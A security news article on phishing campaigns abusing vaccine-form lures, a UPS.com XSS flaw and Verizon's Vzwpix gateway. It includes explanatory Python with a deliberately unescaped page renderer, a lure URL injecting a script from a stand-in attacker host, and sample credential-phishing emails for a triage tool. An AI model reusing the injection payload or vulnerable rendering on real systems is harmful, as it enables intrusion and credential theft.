A patient receives a Pfizer-BioNTech COVID-19 vaccine last May from a nurse at the University of Miami's pediatric mobile unit. (Photo by Joe Raedle/Getty Images)

A trio of phishing reports are shedding light on the eclectic arsenal of techniques that cybercriminals have at their disposal, including using current events such as vaccine news to craft timely and urgent lures, as well as exploiting legitimate services and platforms, like Verizon’s multimedia messaging service and the UPS.com website.

Scammers pose as HR department seeking vaccine documents

Inky this week reported a spate of phishing activity, observed over the summer, in which cybercriminals pretended to be the HR department and asked email recipients to submit a COVID-19 vaccination form.

The pandemic has been a rich source of email lures from the beginning, especially because victims are more likely to click a link or hand over personal information when confronted with an urgent issue that sparks fear and uncertainty. The recent push by various government bodies to encourage vaccination, and vaccine mandates from corporate employers such as Google, Disney and Walmart, are just the latest developments in the coronavirus saga that bad actors are seizing upon.

“I call it surfing the news cycle,” said Roger Kay, vice president of security strategy at Inky. “First it was: ‘COVID – is it dangerous or not?’ And then there was: 'Vaccines – are they dangerous or not?' It was policies for work at home, policies for returning to the office. So every, every turn of the screw, they have a new lure that they can put together. And that's part of how they camouflage the lures.”

Kay expects future phishing campaigns will continue the trend, exploiting other developments like the Lambda variant, booster shots, and back-to-school policies. “Since COVID, there’s been this deep-seated anxiety in the entire society that’s causing everyone disruption and so I think a lot of people are looking to do anything to assuage that anxiety. Like: ‘I need to fix this. Is there some concrete thing I can do to make my life less uncertain?’ And so, the answer is ‘Click this blue big blue button – it'll make you feel safe.’”

According to Inky, the perpetrators sent the phishing emails from hijacked, legitimate external email accounts. That way, the emails would pass standard email authentication checks such as SPF, DKIM and DMARC, which verify that a message really came from the domain it claims to, not that the account's rightful owner wrote it.

One sample fake HR email from this latest campaign stated, “We are learning of new and strict requirements from the County with regards to tracking Covid vaccinations. All employees are Required to complete the Covid Vaccinations form and return it to HR as soon as possible.” The email also imposes a same-day deadline and floats the possibility of serious fines – a tactic designed to make you click the link before thinking it through.

But that link actually takes you to a website designed to look like a Microsoft Outlook web app login page so the cybercriminals can steal your username and password. A second form then asks for additional personal information.

In what Kay called a final “coup de grace,” the attackers then redirect victims to a COVID-19 vaccine form found on the government website for California’s Santa Clara County. It’s a final attempt to feign authenticity so that the victim “doesn't feel cognitive dissonance until later,” and the scammer “has more time, essentially, to escape out the side door without being discovered.”

“It’s frankly not necessary in this case – they already got your credentials – but it is kind of like putting the victim back to sleep,” he said.

UPS.com phish leverages XSS vulnerability

Researcher Daniel Gallagher reported via tweet this week that he encountered “one of the best phishing emails I have seen in a long time” after spotting a campaign that exploited a cross-site scripting flaw in UPS.com in order to distribute malicious Word documents disguised as invoices.

As reported by BleepingComputer, the cybercriminals crafted a lookalike UPS email containing a delivery tracking number that linked to UPS' actual site. Clicking the link triggers the vulnerability: attacker-supplied JavaScript carried in the link executes in the victim's browser in the context of the genuine UPS.com page, which lets the attackers rewrite that page to look as if a legitimate download is about to occur.

Even though the adversaries actually use a remote Cloudflare worker to alter the page and deliver the weaponized document, victims would likely believe the file came from UPS.com, since the download appears in their browser on the real UPS.com domain. The downloaded document must then have its malicious macros enabled before it drops the final payload.
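To make the bug class concrete, here is an added Python example (not UPS's code and not the attackers' payload) of a tracking-lookup page that reflects a URL parameter into its HTML unescaped, beside the escaped version, followed by a simplified Content-Security-Policy check showing why a strict script-src would have stopped the page from pulling script from a remote host such as the attackers' worker. The hostnames, the `tracking` parameter, the lure URL and the policy evaluation are all constructed for illustration.

```python
"""Reflected XSS in a tracking-lookup page, side by side with the escaped version,
plus a simplified Content-Security-Policy check. Added example, not UPS's code;
the URL, hostnames and parameter name are constructed for illustration."""
import html
from urllib.parse import parse_qs, urlsplit

PAGE_TEMPLATE = "<html><body><h1>Tracking {tracking}</h1><p>Status: in transit</p></body></html>"

# Constructed lure: the link points at the real site, but the parameter carries a
# script tag that loads the attacker's remotely hosted script.
LURE_URL = ("https://www.example.com/track?tracking="
            "1Z999%3Cscript%20src%3D%22https%3A%2F%2Fattacker-worker.example%2Fp.js%22%3E%3C%2Fscript%3E")


def tracking_from_url(url: str) -> str:
    """Pull the (URL-decoded) 'tracking' query parameter out of a lookup link."""
    return parse_qs(urlsplit(url).query).get("tracking", [""])[0]


def render_vulnerable(tracking: str) -> str:
    """BUG: attacker-controlled text is dropped straight into the markup, so a value
    containing '<script ...>' runs in the visitor's browser with the site's origin."""
    return PAGE_TEMPLATE.format(tracking=tracking)


def render_fixed(tracking: str) -> str:
    """Fix: encode for the HTML text context. < > & " ' become entities, so the value
    can no longer break out of the <h1>."""
    return PAGE_TEMPLATE.format(tracking=html.escape(tracking, quote=True))


def contains_script_tag(page: str) -> bool:
    return "<script" in page.lower()


def origin_of(url: str) -> str:
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}".lower()


def csp_allows_script(csp_header: str, script_url: str, page_origin: str) -> bool:
    """Simplified CSP evaluation: may a page at page_origin load script_url under this
    policy? Only 'self' and host-source origins in script-src are handled (no default-src
    fallback, no nonces or hashes); real browsers implement far more."""
    sources = None
    for directive in csp_header.split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "script-src":
            sources = parts[1:]
            break
    if sources is None:
        return True  # no script-src directive: nothing restricts script loads
    script_origin = origin_of(script_url)
    for src in sources:
        if src == "'self'" and script_origin == page_origin.lower():
            return True
        if src.lower() == script_origin:
            return True
    return False


if __name__ == "__main__":
    payload = tracking_from_url(LURE_URL)
    print("vulnerable page contains script tag:", contains_script_tag(render_vulnerable(payload)))
    print("fixed page contains script tag:     ", contains_script_tag(render_fixed(payload)))
    print("script-src 'self' allows worker script:",
          csp_allows_script("script-src 'self'", "https://attacker-worker.example/p.js",
                            "https://www.example.com"))
```

A strict script-src does not fix the XSS itself; the reflected markup still lands in the page. What it removes is the second stage: the browser refuses to fetch the remote script, and without 'unsafe-inline' it will not execute the injected inline script either. Output encoding for the right context, as in render_fixed, is the actual fix; CSP is the safety net for the next bug.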

David Pickett, senior cybersecurity analyst at Zix|AppRiver, referred to this incident as a case of “living off the land phishing, which occurs when cybercriminals abuse otherwise legitimate services to blend in with the crowd and mask the true nature of their message.”

“The Zix threat research team has seen a huge uptick in this type of phishing attack over the past few years. The attacks vary greatly in theme and brand being impersonated. However, more attackers have begun posing as a shipping service since the pandemic began, given that consumers are spending less time in stores and shopping more online.”

SC Media reached out to UPS and Daniel Gallagher to confirm if the vulnerability was repaired. A UPS spokesperson subsequently confirmed that the issue was resolved.

Tricksters Text Emails to Targets Using Vzwpix

Cofense on Thursday revealed in a blog post that analysts within its Phishing Defense Center studied the targeting patterns of a cybercriminal campaign that’s been using Verizon’s multimedia messaging service, Vzwpix, as a way to text phishing content to recipients’ email inboxes.

By sending the emails this way, the threat actors can “mass deliver texts that come from a phone number, but not show the name of the sender,” the report states. “This can leave recipients guessing who sent them if they do not recognize the number.” And in their uncertainty, the victim may assume incorrectly that the communication is from a known or trusted source.

Cofense said it received hundreds of reports of this scam in recent weeks, although the company noted that its research turned up examples of this activity taking place over the last two years. Blog author Zachary Bailey, threat analyst at Cofense, told SC Media that the campaign in question was specifically tied to Emotet malware.

Other telecom companies offer similar phone-to-email messaging services to Vzwpix, and according to Bailey, Cofense receives frequent reports of potentially malicious activity involving them as well. “A majority of these have been benign, but the recent phishing campaign shows they can still be a vector that exploits trust in a service employees use,” said Bailey.

“Our customers in the manufacturing and industrial sectors frequently utilize these [services] to send images from the field to their co-workers,” Bailey continued. Consequently, “if they received a lure related to their line of work, they might be tempted to trust it.”

The campaign examined by Cofense analysts used an ACH transfer as its lure and included a link that purportedly led to a new voicemail message. The link evades secure email gateway protections, the blog post explains, by pointing to a legitimate survey application, built with the Alchemer survey form builder and designed to look like a Microsoft OneDrive login page.

Bailey said it is up to organizations to consider whether or not services like Vzwpix “should be treated as trusted services by default,” especially because for many companies, “services like this are not critical to daily operations, and should be viewed with more scrutiny.”
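Both the Inky campaign (mail from hijacked accounts that passes SPF, DKIM and DMARC) and the Vzwpix campaign (mail from a carrier gateway that is itself legitimate) make the same point: authentication tells you the message came from where it says, not that it is safe. The following added Python example, which is not Inky's, Cofense's or any vendor's code, triages constructed sample messages by parsing the Authentication-Results header and then basing the verdict on sender type, link destinations and wording. The sample messages, the `corp.example` and `example-forms.net` domains, the allowlist and the indicator lists are all constructed, and the `number@vzwpix.com` address form is an assumption about how the gateway presents senders.

```python
"""Triage for mail that passes SPF/DKIM/DMARC yet is still phishing: the verdict has to
come from the sender type and the content, not from authentication. Added example; not
Inky's, Cofense's or any vendor's code. Sample messages, domains and indicator lists are
constructed; the number@vzwpix.com address form is an assumption."""
import re
from email import message_from_string
from email.message import Message
from email.utils import parseaddr
from urllib.parse import urlsplit

AUTH_RE = re.compile(r"\b(spf|dkim|dmarc)=(\w+)")
URL_RE = re.compile(r"https?://[^\s<>\"']+")

# Constructed tuning knobs; a real deployment would load these from configuration.
TRUSTED_LINK_DOMAINS = {"corp.example", "login.microsoftonline.com"}
SMS_GATEWAY_DOMAINS = {"vzwpix.com"}  # assumption: Verizon's MMS-to-email gateway; add other carriers
LOGIN_PATH_HINTS = ("outlook", "owa", "onedrive", "login", "signin")
LURE_WORDS = ("as soon as possible", "today", "required", "fines", "sign in", "voicemail", "ach transfer")

# Constructed sample 1: HR vaccine-form lure sent from a compromised partner mailbox.
SAMPLE_HR_LURE = """\
Authentication-Results: mx.corp.example; spf=pass smtp.mailfrom=partner.example; dkim=pass header.d=partner.example; dmarc=pass header.from=partner.example
From: HR Notices <j.doe@partner.example>
To: staff@corp.example
Subject: Required: Covid Vaccinations form due today
Content-Type: text/plain; charset=utf-8

All employees are Required to complete the Covid Vaccinations form and return it to HR
as soon as possible today. Serious fines may apply. Sign in here:
https://owa-login.example-forms.net/outlook/index.php
"""

# Constructed sample 2: voicemail/ACH lure delivered through an MMS-to-email gateway.
SAMPLE_MMS_LURE = """\
Authentication-Results: mx.corp.example; spf=pass smtp.mailfrom=vzwpix.com; dkim=pass header.d=vzwpix.com; dmarc=pass header.from=vzwpix.com
From: 5550100001@vzwpix.com
To: ap-clerk@corp.example
Subject: New voicemail - ACH transfer
Content-Type: text/plain; charset=utf-8

You have a new voicemail about an ACH transfer: https://survey.example-forms.net/s/onedrive
"""

# Constructed sample 3: legitimate internal reminder, used as a control.
SAMPLE_BENIGN = """\
Authentication-Results: mx.corp.example; spf=pass smtp.mailfrom=corp.example; dkim=pass header.d=corp.example; dmarc=pass header.from=corp.example
From: IT Helpdesk <helpdesk@corp.example>
To: staff@corp.example
Subject: Reminder: quarterly password rotation
Content-Type: text/plain; charset=utf-8

Please rotate your password at https://login.microsoftonline.com/ before the end of the quarter.
"""


def auth_results(msg: Message) -> dict:
    """Parse the spf/dkim/dmarc verdicts out of the Authentication-Results header."""
    return dict(AUTH_RE.findall(msg.get("Authentication-Results", "")))


def _host_trusted(host: str) -> bool:
    return any(host == d or host.endswith("." + d) for d in TRUSTED_LINK_DOMAINS)


def triage(raw: str) -> dict:
    msg = message_from_string(raw)
    auth = auth_results(msg)
    body = msg.get_payload(decode=True).decode(msg.get_content_charset() or "utf-8", "replace")
    text = (msg.get("Subject", "") + "\n" + body).lower()
    reasons = []

    # 1. Sender type: a gateway address carries only a phone number, never a sender name.
    sender_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    if sender_domain in SMS_GATEWAY_DOMAINS:
        reasons.append(f"sender is an SMS/MMS-to-email gateway ({sender_domain})")

    # 2. Links: a login-looking page that is not on an allowlisted host.
    urls = URL_RE.findall(body)
    for url in urls:
        host = (urlsplit(url).hostname or "").lower()
        if not _host_trusted(host) and any(h in url.lower() for h in LOGIN_PATH_HINTS):
            reasons.append(f"login-page lookalike link on untrusted host {host}")

    # 3. Wording: urgency, penalties and the campaign themes seen in the reports.
    hits = [w for w in LURE_WORDS if w in text]
    if len(hits) >= 2:
        reasons.append("lure wording: " + ", ".join(hits))

    return {
        "authenticated": all(auth.get(k) == "pass" for k in ("spf", "dkim", "dmarc")),
        "auth": auth,
        "urls": urls,
        "suspicious": bool(reasons),
        "reasons": reasons,
    }


if __name__ == "__main__":
    for name, sample in (("HR lure", SAMPLE_HR_LURE), ("MMS lure", SAMPLE_MMS_LURE), ("benign", SAMPLE_BENIGN)):
        verdict = triage(sample)
        print(f"{name}: authenticated={verdict['authenticated']} suspicious={verdict['suspicious']}")
        for reason in verdict["reasons"]:
            print("   -", reason)
```

All three samples authenticate cleanly; only the content checks separate the two lures from the control. The gateway check is deliberately a flag rather than a block, which matches Bailey's point that these services are benign for most users and the decision of whether to treat them as trusted by default belongs to the organization.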

Bailey also said businesses should train employees to be aware of abuse of SMS-to-email services. Improving workers’ cybersecurity awareness, including reviewing the latest phishing trends and the telltale warning signs of a scam, would help against the other campaigns described above as well.